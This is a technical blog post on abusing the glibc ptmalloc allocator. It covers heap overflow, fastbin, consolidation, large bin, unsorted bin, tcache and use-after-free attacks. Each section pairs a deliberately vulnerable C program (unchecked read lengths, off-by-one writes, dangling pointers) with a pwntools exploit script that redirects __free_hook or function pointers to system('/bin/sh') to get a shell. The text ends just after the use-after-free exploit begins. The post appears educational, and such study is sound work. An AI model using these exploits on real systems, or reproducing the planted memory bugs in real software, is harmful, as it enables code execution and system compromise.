Breaking Memory Safety in the Heap Arena

In my previous post, I provided an extensive analysis of the memory allocator used by the GNU C library. In this post, I’ll show how weaknesses in the glibc heap allocator design can be abused to turn memory errors like buffer overflows (spatial defects) or use-after-free bugs (temporal errors) into powerful exploits that allow arbitrary code execution.

memory access violations categorized as either *spatial* or *temporal* defects

Heap exploits typically abuse allocator metadata (often stored immediately before allocated object to support fast freeing and coalescing) or leverage holes created by binning. When a heap allocator lacks robust built-in security mechanisms (as in freelist-based allocators like ptmalloc), it can be targeted to initiate attacks.

Introduction

Memory allocators are fundamental standardized components that provide dynamic memory management. They serve user programs memory dynamically at runtime. The goal is to reduce the cognitive burden on programmers. Rather than manually managing fragmentation (holes between allocated chunks), alignment, performance trade-offs, and portability across architectures, developers can focus on implementing application-specific functionality and business logic.

As is well-known, heap memory is typically requested through high-level APIs such as malloc(size) and later released via free(ptr). Internally, the allocator is free to do any type of machinery to optimize performance, promote spatial and temporal locality and reduce memory fragmentation. When these APIs are invoked correctly, the allocator can assume that the heap state is consistent (i.e not corrupted).

However, when applications interface with untrusted input, the exploitability of spatial and temporal memory safety violations or defects (e.g., heap overflows, use-after-free, double free) becomes strongly dependent on the design and robustness of the underlying memory allocator. If the allocator can be easily tricked, then it becomes an attack vector used to corrupt the heap state and achieve arbitrary code execution; for instance the design of the ptmalloc makes it impossible to determine whether a given chunk was originally allocated by malloc or fabricated by an attacker (this is addressed using integrity checks).

This post discusses the widely known heap allocator ptmalloc, the default heap allocator of glibc, the standard C runtime library used by most Linux systems. It is a descendant of the Doug Lea dlmalloc implementation, enhanced to support multithreading by Wolfram Gloger.

As we will explore later, ptmalloc uses several low-level programming tricks to be efficient for satisfying a memory request; however, adversaries can exploit it, as ptmalloc was not designed with security as a first-class concern and assumes that the API is used correctly i.e. the heap state is never corrupted.

Additionally, various memory corruption exploit techniques against ptmalloc are discussed (glibc version used is 2.27), supported by proof-of-concept code (available at https://github.com/mouadk/low-level-exploits). Most of these attacks are now obsolete, as the allocator has since been hardened to defend itself against a wide range of memory corruptions. An extensive analysis of CVE-2021-3156 is also provided.

Finally, we conclude by briefly discussing existing mitigations implemented at the hardware, kernel, and compiler levels, including Address Space Layout Randomization (ASLR), runtime sanitizers, and Memory Tagging.

Stack overflow

Stack overflow exploits take advantage of the proximity of control-flow critical data within a program’s stack memory, such as return addresses and saved frame pointers (e.g. redirecting a return address to attacker-controlled code). They were highly effective historically and received substantial attention. However, the introduction of modern mitigations such as No-Execute (NX), which marks memory pages as non-executable; Address Space Layout Randomization (ASLR), randomizing the base address of various segments (stack, heap, BSS, etc); stack canaries, which protect against return address overwrites or stack smashing; Position-Independent Executables (PIE), randomizing code segments; and Read-Only Relocations (RELRO), protecting the Global Offset Table (GOT), has rendered traditional stack overflow techniques largely ineffective on contemporary systems. While patient and dedicated adversaries may still bypass all possible mitigations (e.g by leveraging memory leaks), the attack surface has been substantially reduced.

As stack-based exploits became less practical, adversaries shifted their focus toward heap exploitation. Heap-based overflow vulnerabilities arise in dynamically allocated memory regions. Exploitation strategies generally fall into two categories. The first targets application-specific data structures on the heap. While this can corrupt program state, such attacks are often unstable and highly dependent on the application’s logic. The second, and more broadly impactful, approach targets the heap allocator’s metadata. By corrupting allocator bookkeeping structures, attackers can obtain powerful primitives, such as arbitrary memory writes, which in turn facilitate control-flow hijacking and arbitrary code execution. These techniques form the basis of the exploitation strategies discussed in subsequent sections.

The Heap

Heap-based exploitations consists of a memory defect (i.e programmers failed to manage memory properly) + an exploitable memory allocator such as ptmalloc2. Naturally, adversaries need to comprehend how the the underlying memory allocator works in order to complete a heap based exploitation (e.g if binning is used, where chunk or heap metadata are located, if integrity checks can be bypassed etc). An application or program with zero memory defects is of course not vulnerable to heap attacks; application vulnerabilities are naturally required.

In ptmalloc, the heap is organized into contiguous blocks or chunks of memory. Two adjacent free chunks are coalesced into a larger chunk (cf. consolidation attacks) and maintained in bins implemented as single or double linked lists.

Heap chunks size is always aligned to MALLOC_ALIGNMENT (typically 16 bytes). Each chunk carries a fixed metadata overhead, which includes the size of the current chunk and the size of the previous chunk (the latter is used during backward consolidation while the former is used during forward consolidation). The allocator also enforces a minimum allocatable chunk size ( MINSIZE = 32 bytes).

The top chunk, which represents the remainder of the heap segment managed by the allocator, is never inserted into any bin but is instead used to service new allocation requests or extended when additional memory is requested from the kernel (e.g via sbrk or mmap system call).

For a detailed discussion of the allocator internals, see my previous post https://www.deep-kondah.com/glibc-heap-internals/.

Vanilla Heap Overflow

A buffer overflow occurs when a program performs an out-of-bounds write beyond the boundary of a vulnerable buffer or chunk. Naturally, the impact of such an overflow depends on the memory segment in which it occurs. The chief kernel organizes the virtual address space into segments such as the stack, heap, bss, and data.

Thus, different types of overflows have different implications. A stack overflow can allow attackers to overwrite the return address or saved frame pointers leading to control flow hijacking and arbitrary code execution. On the other hand, a heap overflow, can be more complex to exploit. The memory layout of the heap is non-deterministic and highly dependent on the application and one needs something application agnostic like return address and frame pointers to construct stable exploits; this why adversaries redirect their focus to corrupting internal metadata of memory allocators, such as prev_size, size which sit near vulnerable chunks.

In this subsection, we shift our focus to overflows that target the contents of adjacent chunks, rather than allocator metadata (which will be covered later).

The example below demonstrates a naive heap overflow, where the chunk allocated for the provided id is smaller than the actual input. In this case, 40 bytes are read, causing a 16-byte overflow beyond the intended chunk boundary.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    char *name;
} User;

User *user;
char *id;

void setup() {
    id = malloc(24);
    user = malloc(sizeof(User));
    user->name = malloc(9);
}

void tear_down(){
    free(id);
    free(user->name);
    free(user);
}

void enter_user() {
    char buf[9];
    printf("enter user: ");
    read(0, buf, sizeof(buf));
    strcpy(user->name, buf);
}

void enter_id() {
    printf("enter id: ");
    read(0, id, 40); // overflow 40>24
}

int main() {
    setup();
    int choice;
    while (1) {
        printf("\n=== Menu ===\n");
        printf("1. Enter User\n");
        printf("2. Enter ID\n");
        printf("3. Exit\n> ");
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1: enter_user(); break;
            case 2: enter_id(); break;
            case 3: tear_down(); exit(0);
            default: break;
        }
    }
    return 0;
}

As illustrated below, the user chunk is placed next to chunk id, housing 8 bytes pointer to a buffer that is later populated using strcpy().

This allows the overflow to overwrite the pointer to point to __free_hook (pointer to function called whenever free() is invoked):

void weak_variable (*__free_hook) (void *, const void *) = NULL;

and subsequently overwrite the value stored there with the address of system(). When free(ptr) is later called, it executes system(ptr), and if ptr points to /bin/sh, it results in a shell being spawned.

The exploit code is shown below.

from pwn import *
payload = b""
payload += b"2\n"
binsh = b"/bin/sh\x00"
padding = b"A" * (24 - len(binsh))
padding += p64(0x21) # size
free_hook = p64(0x7ffff7dcf8e8) #  __free_hook address this overrides pointer value
payload += binsh + padding + free_hook + b"\n"
payload += b"1\n"
system_addr = p64(0x7ffff7a31420) # system address placed at __free_hook
payload += system_addr + b"\n" # trigger free
payload += b"3\n"
with open("heap_classic.bin", "wb") as f:
    f.write(payload)

One can confirm that we are able to get a shell:

Fast Bins Attacks

In a fastbin attack, the objective is to exploit a vulnerable heap chunk and corrupt the forward pointer or fd of an adjacent freed indexed malloc chunk. The adversary can then manipulate the fastbin linked list (maintained by the allocator) and influence subsequent allocations.

Consider the following naive program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    char id[24];
} User;

typedef struct {
    char ctx[24];
} Context;

typedef struct {
    void (*print)(char* data);
} UserPrinter;

Context *context;
UserPrinter *printer;
User *users[3];

void do_print(char *data) {
    printf("data: %s\n", data);
}

void menu() {
    puts("1. Create user");
    puts("2. Delete context");
    puts("3. Create context");
    puts("4. Create printer");
    puts("5. Edit user");
    puts("6. Print user");
    puts("7. Exit");
    printf("> ");
}

void create_user() {
    for (int i = 0; i < 3; i++) {
        if (!users[i]) {
            users[i] = malloc(sizeof(User));
            printf("enter user id: ");
            read(0, users[i]->id, sizeof(users[i]->id));
            printf("User %d created.\n", i);
            return;
        }
    }
}

void delete_context() {
    if (context) {
        free(context);
        context = NULL;
        puts("Context deleted.");
    } else {
        puts("No context to delete.");
    }
}

void create_context() {
    if (!context) {
        context = malloc(sizeof(Context));
        printf("Enter context: ");
        read(0, context->ctx, sizeof(context->ctx));
        puts("Context created.");
    } else {
        puts("Context already exists.");
    }
}

void create_printer() {
    if (!printer) {
        printer = malloc(sizeof(UserPrinter));
        printer->print = do_print;
        puts("Printer created.");
    } else {
        puts("Printer already exists.");
    }
}

void edit_user() {
    int idx;
    printf("User index (0-2): ");
    scanf("%d", &idx);
    getchar();
    if (idx >= 0 && idx < 3 && users[idx]) {
        printf("New id: ");
        read(0, users[idx]->id, 40);  // overflow
        puts("User edited.");
    } else {
        puts("Invalid index or user doesn't exist.");
    }
}

void print_user() {
    if (printer && printer->print) {
        int idx;
        printf("User index (0-2): ");
        scanf("%d", &idx);
        getchar();
        if (idx >= 0 && idx < 3 && users[idx]) {
            printer->print(users[idx]->id);
        } else {
            puts("Invalid index or user doesn't exist.");
        }
    } else {
        puts("Printer not available.");
    }
}

int main() {
    int choice;
    while (1) {
        menu();
        scanf("%d", &choice);
        getchar();
        switch (choice) {
            case 1: create_user(); break;
            case 2: delete_context(); break;
            case 3: create_context(); break;
            case 4: create_printer(); break;
            case 5: edit_user(); break;
            case 6: print_user(); exit(0);  // exits once print finishes it as this is targeted
            case 7: exit(0);
            default: puts("invalid option.");
        }
    }
}

Three objects are allocated in the heap: user (vulnerable), context (gadget), and printer (target). The attack proceeds as follows: the context is freed causing its chunk to be placed into the corresponding fastbin. The user vulnerable chunk is exploited to overwrite the forward pointer of the freed context chunk. The forward pointer is corrupted to reference the printer chunk (target). Next, the context object is reallocated which causes the allocator to return the corrupted chunk from the fastbin linked list or freelist. Allocating another user object results in the allocator returning the target chunk (printer) thereby enabling the attacker to overwrite the function pointer (print), redirecting execution to an attacker-controlled function (e.g. here system).

The exploit code is shown below:

from pwn import *

target_addr = 0x5555557572c0  # target_addr is actually target_addr(0x5555557572d0) - 0x10
system_addr = 0x7ffff7a31420

def send_menu(choice):
    return str(choice).encode() + b'\n'

payload = b""
payload += send_menu(1)
payload += b"A" * 24  
payload += send_menu(3) 
payload += b"B" * 24
payload += send_menu(4)  # create  printer
payload += send_menu(2)  # delete context -> allocator indexes chunk...
payload += send_menu(5)  # set user id and exploit overflow
payload += b"0\n"  # user idx to modify...
overflow = b"/bin/sh\n".ljust(24, b"\x00")
overflow += p64(0x21)  # set size 0x20 |0x1
overflow += p64(target_addr)  # set fd pointer to target address
payload += overflow
payload += send_menu(3)  # create context ...
payload += b"C" * 24
payload += send_menu(1)  # create user ... and overwrite print address
payload += p64(system_addr).ljust(24, b"\x00") + b"\n"
payload += send_menu(6)  # call print/system
payload += b"0\n"  # user idx to print...
payload += send_menu(7)  
with open("fb_poisoning.bin", "wb") as f:
    f.write(payload)

As shown below, the corruption of allocator metadata enables control-flow hijacking and enables spawning a shell.

Consolidation Attack

Here, an off-by-one overflow is exploited to corrupt the chunk size metadata of an adjacent allocation, which tricks the allocator into believing that the preceding chunk is free, thereby triggering backward consolidation during the next free operation.

  /* Consolidate backward.  */
  if (!prev_inuse(p))
    {
      INTERNAL_SIZE_T prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

_int_free_merge_chunk

Specifically, the consolidated chunk is not placed directly in the smallbin index:

   if (!in_smallbin_range (size))
        {
          /* Place large chunks in unsorted chunk list.  Large chunks are
             not placed into regular bins until after they have
             been given one chance to be used in malloc.

             This branch is first in the if-statement to help branch
             prediction on consecutive adjacent frees. */
          bck = unsorted_chunks (av);
          fwd = bck->fd;
          if (__glibc_unlikely (fwd->bk != bck))
            malloc_printerr ("free(): corrupted unsorted chunks");
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
      else
        {
          /* Place small chunks directly in their smallbin, so they
             don't pollute the unsorted bin. */
          int chunk_index = smallbin_index (size);
          bck = bin_at (av, chunk_index);
          fwd = bck->fd;

          if (__glibc_unlikely (fwd->bk != bck))
            malloc_printerr ("free(): chunks in smallbin corrupted");

          mark_bin (av, chunk_index);
        }

Because the next chunk is top chunk, a consolidation is activated which enlarges the top chunk:

    {
      /* If the chunk borders the current high end of memory,
	 consolidate into top.  */
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

As a result, a subsequent allocation returns a pointer into a region that overlaps with the target object enabling the attacker to overwrite a function pointer, which, when invoked, redirects execution to the system library (e.g., system("/bin/sh")).

A naive proof-of-concept code is shown below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    char name[8];
    char id[16];
} User;  // requested size is mapped internally to 0x20 = malloc alignment and 0x8 is borrowed from next chunk


typedef struct {
    char ctx[0x88];  // size should be large than fast
} Context;


typedef struct {
    void (*print)(char* data);
} UserPrinter;  // the print func pointer is mapped to name in user struct and the goal is to point print to libc system and turn print(usr->id) to system(/bin/sh)

Context *context;
UserPrinter *printer;
User *user;

void do_print(char *data) {
    printf("data: %s\n", data);
}

void print_user() {
    if(printer){
        printer->print(user->id);
        printer->print(user->name);
    }
}

void update_user() {
    read(0, user->name, 8);
    read(0, user->id, 17); // 1 byte overflow (16 + 1)
}

void delete_ctx() {
   if(context){
       free(context);
       context=NULL;
   }
}

void create_printer(){
    printer = malloc(sizeof(UserPrinter));
    printer->print = do_print;
}

int main() {
    user = malloc(sizeof(User));
    context = malloc(sizeof(Context));
    int choice;
    while (1) {
        printf("\n=== Menu (commented) ===\n");
        /*
        printf("\n=== Menu ===\n");
        printf("1. Create User\n");
        printf("2. Delete User\n");
        printf("3. Create Printer\n");
        printf("4. Update User Name\n");
        printf("5. Print User\n");
        printf("6. Exit\n> ");
         */
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1: update_user(); break;
            case 2: delete_ctx(); break;
            case 3: create_printer(); break;
            case 6: print_user();
            case 7: exit(0);
            default:break;
        }
    }
}

The process is illustrated below.

Here is what the exploit code looks like:

payload = b""
payload = b""
payload += b"1\n"
payload += p64(0x555555757280) # whatever
payload += p64(0x555555757280) # whatever
payload += p64(0x20)
payload += b"\x90" # off by one overflow clear prev in use bit 0x91 -> 0x90
payload += b"2\n"
payload += b"3\n"
payload += b"1\n"
payload += p64(0x7ffff7a31420)
payload += b"/bin/sh\n".ljust(17, b"\x00")
payload += b"6\n"
payload += b"7\n"


with open("off-by-one.bin", "wb") as f:
    f.write(payload)

As shown below, the top chunk is now at 0x555555757280 ; same as in_use user chunk:

And subsequent allocation serves exactly this chunk:

Large Bin Attack

In a Large Bin Attack, both the forward fd and backward bk pointers of a freed large chunk are corrupted. The goal is to manipulate the large bin’s doubly linked list so that a subsequent allocation overlaps with an attacker-controlled region and in simile spirt as before hijack the control flow.

Specifically, by overwriting the bk pointer to reference a user-controlled chunk, the allocator can be tricked into returning this chunk when the corrupted chunk is later unlinked from the large bin.

However, unlike fastbin freelists, when a large chunk is freed, if the adjacent chunk is not the top chunk, it is initially placed into the unsorted bin. Only after a subsequent allocation request does the allocator process the unsorted bin and insert the chunk into the large bin’s doubly linked list. Additionally, the attacker must first create a hole between the freed chunk and the top chunk, ensuring it will be indexed into the large bin rather than consolidated with the top block. Then, through controlled allocations and pointer corruption, the large bin unlink operation can be abused to redirect allocations.

 static INTERNAL_SIZE_T
_int_free_create_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size,
			mchunkptr nextchunk, INTERNAL_SIZE_T nextsize)
{
  if (nextchunk != av->top)
    {
      /* get and clear inuse bit */
      bool nextinuse = inuse_bit_at_offset (nextchunk, nextsize);

      /* consolidate forward */
      if (!nextinuse) {
	unlink_chunk (av, nextchunk);
	size += nextsize;
      } else
	clear_inuse_bit_at_offset(nextchunk, 0);

      mchunkptr bck, fwd;

      if (!in_smallbin_range (size))
        {
          /* Place large chunks in unsorted chunk list.  Large chunks are
             not placed into regular bins until after they have
             been given one chance to be used in malloc.

             This branch is first in the if-statement to help branch
             prediction on consecutive adjacent frees. */
          bck = unsorted_chunks (av);
          fwd = bck->fd;
          if (__glibc_unlikely (fwd->bk != bck))
            malloc_printerr ("free(): corrupted unsorted chunks");
          p->fd_nextsize = NULL;
          p->bk_nextsize = NULL;
        }
      else
        {
          /* Place small chunks directly in their smallbin, so they
             don't pollute the unsorted bin. */
          int chunk_index = smallbin_index (size);
          bck = bin_at (av, chunk_index);
          fwd = bck->fd;

          if (__glibc_unlikely (fwd->bk != bck))
            malloc_printerr ("free(): chunks in smallbin corrupted");

          mark_bin (av, chunk_index);
        }

      p->bk = bck;
      p->fd = fwd;
      bck->fd = p;
      fwd->bk = p;

      set_head(p, size | PREV_INUSE);
      set_foot(p, size);

      check_free_chunk(av, p);
    }
  else
    {
      /* If the chunk borders the current high end of memory,
	 consolidate into top.  */
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);
    }

  return size;
}

This is illustrated below:

The following proof-of-concept program demonstrates the above scenario. The exploit leverages a buffer overflow in theUser structure to corrupt the metadata of a freed Context chunk. Subsequent allocations manipulate the large bin linked list such that the allocator reuses memory in a way that overlaps a UserPrinter object with attacker-controlled data. The final step hijacks the function pointer, redirecting execution to the system library:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

typedef struct {
    char name[8];
    char id[24];
} User;  // requested size is mapped internally to 0x20 = malloc alignment and 0x8 is borrowed from next chunk


typedef struct {
    char ctx[0x420];  // large enough
} Context;

typedef struct {
    void (*print)(char *data);
} UserPrinter;

User *user;
Context *context;
UserPrinter *printer;

void do_print(char *data) {
    printf("data: %s\n", data);
}

void print_user(){
    printer->print(user->id);
}

void menu() {
    puts("1. Create User");
    puts("2. Create Context");
    puts("3. Dummy Alloc (prevent consolidation)");
    puts("4. Delete Context");
    puts("5. Allocate Large Chunk");
    puts("6. Update User (Overflow)");
    puts("7. Reallocate Context (trigger unlink)");
    puts("8. Create Printer (overlaps User)");
    puts("9. Final Update (set system + /bin/sh)");
    puts("10. Print User");
    puts("11. Exit");
}

int main() {
    while (1) {
        menu();
        int choice;
        scanf("%d", &choice);
        getchar();
        switch (choice) {
            case 1:
                // create user
                user = malloc(sizeof(User));
                break;
            case 2:
                // create context
                context = malloc(sizeof(Context));
                break;
            case 3:
                // dummy alloc (prevent consolidation)
                malloc(sizeof(User));
                break;
            case 4:
                // delete context
                free(context);
                context = NULL;
                break;
            case 5:
                malloc(0x524);  // trigger large bin indexing
                break;
            case 6:
                read(0, user->name, 8);
                read(0, user->id, 56);  // overflow into freed context
                break;
            case 7:
                printer = malloc(sizeof(UserPrinter));  // overlaps with user
                printer->print = do_print;
                break;
            case 8:
                // update user
                read(0, user->name, 8);
                read(0, user->id, 8);
                break;
            case 9:
                print_user();
                exit(0);
            case 10:
                puts("bye");
                exit(0);
            default:
                puts("invalid");
        }
    }
}

As demonstrated below, the large bin index was corrupted. Before the actually printer allocation, the large bin state looks as follows: (the user chunk 0x555555757280 is inserted):

After allocation (malloc chunk at 0x555555757280 is served):

The exploit code is listed below:

payload = b""
payload += b"1\n"        # create user
payload += b"2\n"        # create context
payload += b"3\n"        # dummy alloc (prevent consolidation)
payload += b"4\n"        # free context
payload += b"5\n"        # allocate large chunk
payload += b"6\n"        # update user (overflow)
payload += p64(0x5555557572b0) #  FD
payload += p64(0x555555757290) # BK, so that unlink check passes
payload += p64(0x555555757280) # fd_nextsize points to itself
payload += p64(0x555555757280)  # bk_nextsize points to itself
payload += p64(0x30) # set previous size
payload += p64(0x431)  # do not touch size
payload += p64(0x7ffff7dce090) # fd pointer should point to arena
payload += p64(0x555555757280) # bk pointer should point to user chunk
payload += b"2\n"        # reallocate context
payload += b"7\n"        # create printer (overlaps with user)
payload += b"8\n"        # write /bin/sh + system
payload += p64(0x7ffff7a31420) # system addr
payload += b"/bin/sh\x00"
payload += b"9\n"       # trigger print (system("/bin/sh"))


with open("unlink.bin", "wb") as f:
    f.write(payload)

And as shown below, we were able to get a shell:

Unsorted Bin Attack

We apply similar technique here, the forward (fd) and backward (bk) pointers of an indexed chunk are corrupted so that they reference a target chunk already in use. As a result, during subsequent unlinking, the allocator treats the target as a free chunk and inserts it into the bin list, effectively producing an overlap between a newly allocated chunk and the in-use target chunk enabling hijacking the control flow. The key difference from the earlier scenario is that large chunks are first inserted directly into the unsorted bin when freed. Consequently, the corruption offd/bk alone is sufficient to manipulate the bin list and achieve the desired overlap (i.e we don't need to trigger allocation; a dummy chunk needs to be placed to avoid consolidation though).

The proof of concept code is shown below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    char name[8];
    char id[16];
} User;

typedef struct {
    char ctx[0x88];
} Context;

typedef struct {
    void (*print)(char *data);
} UserPrinter;

Context *context = NULL;
UserPrinter *printer = NULL;
User *user = NULL;

void do_print(char *data) {
    printf("data: %s\n", data);
}

void menu() {
    puts("==== Menu ====");
    /*
    puts("1. Create user");
    puts("2. Update user");
    puts("3. Delete context");
    puts("4. Create printer");
    puts("5. Print user");
    puts("6. Exit");
    puts("7. Allocate context");
    printf("> ");
     */
}

void create_user() {
    if (!user) {
        user = malloc(sizeof(User));
        puts("User created.");
    } else {
        puts("User already exists.");
    }
}

void update_user() {
    if (!user) {
        puts("Create user first.");
        return;
    }
    printf("Name: ");
    read(0, user->name, 8);
    printf("ID: ");
    read(0, user->id, 40); // overflow
    puts("User updated.");
}

void delete_ctx() {
    if (context) {
        free(context);
        context = NULL;
        puts("Context deleted.");
    } else {
        puts("No context.");
    }
}

void create_ctx() {
    if (!context) {
        context = malloc(sizeof(Context));
        puts("Context allocated.");
    } else {
        puts("Context already exists.");
    }
}

void create_printer() {
    if (!printer) {
        printer = malloc(sizeof(UserPrinter));
        printer->print = do_print;
        puts("Printer created.");
    } else {
        puts("Printer already exists.");
    }
}

void print_user() {
    if (printer && user) {
        printer->print(user->id);
    } else {
        puts("Missing printer or user.");
    }
}


int main() {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    user = malloc(sizeof(User));
    context = malloc(sizeof(Context));
    malloc(24); // create a hole: this is to prevent consolidation but just ignore it ...

    int choice;
    while (1) {
        menu();
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1:
                create_user();
                break;
            case 2:
                update_user();
                break;
            case 3:
                delete_ctx();
                break;
            case 4:
                create_printer();
                break;
            case 5:
                print_user();
                puts("if shell then succeeded otherwise try again...");
                exit(0);
            case 6:
                puts("Bye!");
                exit(0);
            case 7:
                if (!context) {
                    context = malloc(sizeof(Context));
                    puts("Context allocated.");
                } else {
                    puts("Context already exists.");
                }
                break;
            default:
                puts("Invalid choice.");
                break;
        }
    }
}

Here is what the exploit code looks like:

from pwn import *

system_addr = 0x7ffff7a31420
fake_chunk = 0x555555757290
target_chunk = 0x555555757280

payload = b""

payload += b"3\n" # delete context

payload += b"2\n"
payload += p64(fake_chunk)                          # user->name
payload += p64(fake_chunk).ljust(16, b'\x00')       # fd
payload += p64(0x91)                                # size
payload += p64(target_chunk)                        # fd
payload += p64(target_chunk)                        # bk

# allocate same-sized chunk to poison the unsorted bin
payload += b"7\n"

# allocate printer now it should conflict with user chunk i.e target_chunk
payload += b"4\n"

# overwrite printer->print = system and user->id = "/bin/sh"
payload += b"2\n"
payload += p64(system_addr)                         # printer->print = system
payload += b"/bin/sh\x00".ljust(40, b"\x00")        # user->id = "/bin/sh"
# trigger  system("/bin/sh")
payload += b"5\n"


with open("unlink.bin", "wb") as f:
    f.write(payload)

As one can see below, the unsorted bin was corrupted:

And we were able to get a shell:

Tcache Bins Attacks

In a tcache poisoning attack, the vulnerable chunk is exploited to overwrite the next pointer of a freed chunk stored in the tcache and redirecting this pointer to in-use chunk; the allocator is then tricked into returning an overlapping allocation.

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  uintptr_t key;
} tcache_entry;

This is illustrated below:

A naive proof-of-concept code is listed below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    char name[8];
    char id[8];
} User;

typedef struct {
    char ctx[8];
} Context;

typedef struct {
    void (*print)(char *data);
} UserPrinter;

User *user = NULL;
Context *context = NULL;
UserPrinter *printer = NULL;

void do_print(char *data) {
    printf("data: %s\n", data);
}

void print_user() {
    if (printer && printer->print)
        printer->print(user->id);
}

void create_user() {
    user = malloc(sizeof(User));
    puts("User created.");
}

void create_context() {
    context = malloc(sizeof(Context));
    puts("Context created.");
}

void delete_context() {
    free(context);
    puts("Context deleted.");
}

void update_user() {
    if (!user) {
        puts("No user.");
        return;
    }
    puts("Enter name:");
    read(0, user->name, 8);
    puts("Enter ID:");
    read(0, user->id, 32);  // overflow!
    puts("User updated.");
}

void create_printer() {
    printer = malloc(sizeof(UserPrinter));
    printer->print = do_print;
    puts("Printer created.");
}

void final_update() {
    if (!user) return;
    puts("Enter name:");
    read(0, user->name, 8);
    puts("Enter ID:");
    read(0, user->id, 8);
    puts("Final update done.");
}

// good for us glibc does not check count and blinldy trust  tcache->entries[tc_idx] != NULL hehe
// so it is enough to place a chunk there first and then corrupt the next pointer and then when return tcache_get (tc_idx); is called
//  tcache->entries[tc_idx] = e->next; is invoked essentially placing our fake chunk
int main() {
    int choice;
    while (1) {
        scanf("%d", &choice);
        getchar();
        switch (choice) {
            case 1: create_user(); break;
            case 2: create_context(); break;
            case 4: delete_context(); break;
            case 6: update_user(); break;
            case 8: create_printer(); break;
            case 9: final_update(); break;
            case 10: print_user(); exit(0);
            case 11: exit(0);
            default: puts("invalid"); break;
        }
    }
}

As shown below, the tcache bin index has been corrupted and both the User and Printer structures have been allocated from the same underlying heap chunk, resulting in a complete overlap in both physical and virtual memory.

This what that the tcache index looks like before the corruption:

Once corrupted, here is what the new state looks like

Now before controlled allocation (pointing to user chunk 0x555555757290):

And here is the state once the user chunk served:

The exploit is shown below:

from pwn import *
TARGET_CHUNK = 0x555555757290
SYSTEM_ADDR = 0x7ffff7a31420

payload = b""
payload += b"1\n"
payload += b"2\n"
payload += b"4\n"
payload += b"6\n"
overflow  = b"B"*24
overflow += p64(0x21)
overflow += p64(TARGET_CHUNK)   # tcache next ptr
payload += overflow
payload += b"2\n" # realloc context
payload += b"8\n"# create Pprinter
payload += b"9\n" #  set print ptr to system, and id to "/bin/sh"
payload += p64(SYSTEM_ADDR)
payload += b"/bin/sh\x00"
payload += b"10\n" # trigger print_user

with open("tcache_p.bin", "wb") as f:
    f.write(payload)

Use-After-Free (UAF)

A use-after-free or uaf occurs when a program continues to use a pointer to a heap allocated chunk after it has been deallocated using free(), without resetting the pointer to NULL (dangling pointer). The program may then try to read from, write to, or execute code via the freed memory. Since the memory region has been released back to the allocator, subsequent allocations may reuse that same chunk or overlap with the still referenced freed chunk, allowing the attacker to corrupt or control its contents (e.g function pointers). For instance, fast bins in ptmalloc organize freed chunks a in LIFO order and are indexed by size. Once a vulnerable chunk is freed, the next allocation of the same size would return that same chunk. If user-controlled data is written into the new allocation, it may overwrite critical fields like function pointers still accessed through the dangling pointer. When the program later uses the corrupted pointer, it may execute attacker controlled code, enabling arbitrary code execution (assuming attacker defeated ASLR).

A naive poc is listed below.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    char name[8];
    char *id;
} User;

typedef struct {
    void (*print)(char* data);
} UserPrinter;

User *user;
UserPrinter *printer;

void print_user() {
    if(printer){
        printer->print(user->id);
        printer->print(user->name);
    }
}

void create_user() {
    char name_input[9], id[9];
    printf("enter user name: \n");
    if (!fgets(name_input, sizeof(name_input), stdin)) return;
    name_input[strcspn(name_input, "\n")] = 0;

    printf("enter user id: \n");
    if (!fgets(id, sizeof(id), stdin)) return;
    id[strcspn(id, "\n")] = 0;
    User *u = malloc(sizeof(User));
    if (!u) {
        perror("malloc");
        exit(1);
    }
    memcpy(u->name, name_input, 7);
    u->name[7] = 0;
    u->id = strdup(id);
    user = u;
}

void do_print(char *data) {
    printf("data: %s\n", data);
}

void delete_user() {
    if (user) {
        free(user->id);
        free(user);
    }
}

void create_printer() {
    printer = malloc(sizeof(UserPrinter));
    printer->print = do_print;
}

void update_user_name() {
    char buf[9];
    if (!user) {
        printf("no user to update.\n");
        return;
    }
    printf("updating user name: ");
    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    memcpy(user->name, buf, 7);
    user->name[7] = 0;
}

void update_user_id() {
    char buf[9];
    if (!user) {
        printf("no user to update.\n");
        return;
    }
    printf("updating user id: ");
    fgets(buf, sizeof(buf), stdin);
    buf[strcspn(buf, "\n")] = 0;
    user->id = strdup(buf);
}


int main() {
    setbuf(stdout, NULL);
    int choice;
    while (1) {
        /*
        printf("\n=== Menu ===\n");
        printf("1. Create User\n");
        printf("2. Delete User\n");
        printf("3. Create Printer\n");
        printf("4. Update User Name\n");
        printf("5. Print User\n");
        printf("6. Exit\n> ");
         */
        scanf("%d%*c", &choice);
        switch (choice) {
            case 1: create_user(); break;
            case 2: delete_user(); break;
            case 3: create_printer(); break;
            case 4: update_user_name(); break;
            case 5: update_user_id(); break;
            case 6: print_user(); break;
            case 7: exit(0);
            default:break;
        }
    }
    return 0;
}

The temporal flow is illustrated below (for simplicity, tcache is disabled).

Basically when the program is instructed to free the user struct, the chunk is deallocated but the global variable user still references the same chunk. Another structure is then allocated using the same chunk and subsequent update corrupts its function pointer leading to control hijacking.

The exploit code is listed below:

# receiver expects input is line-based
payload = b""
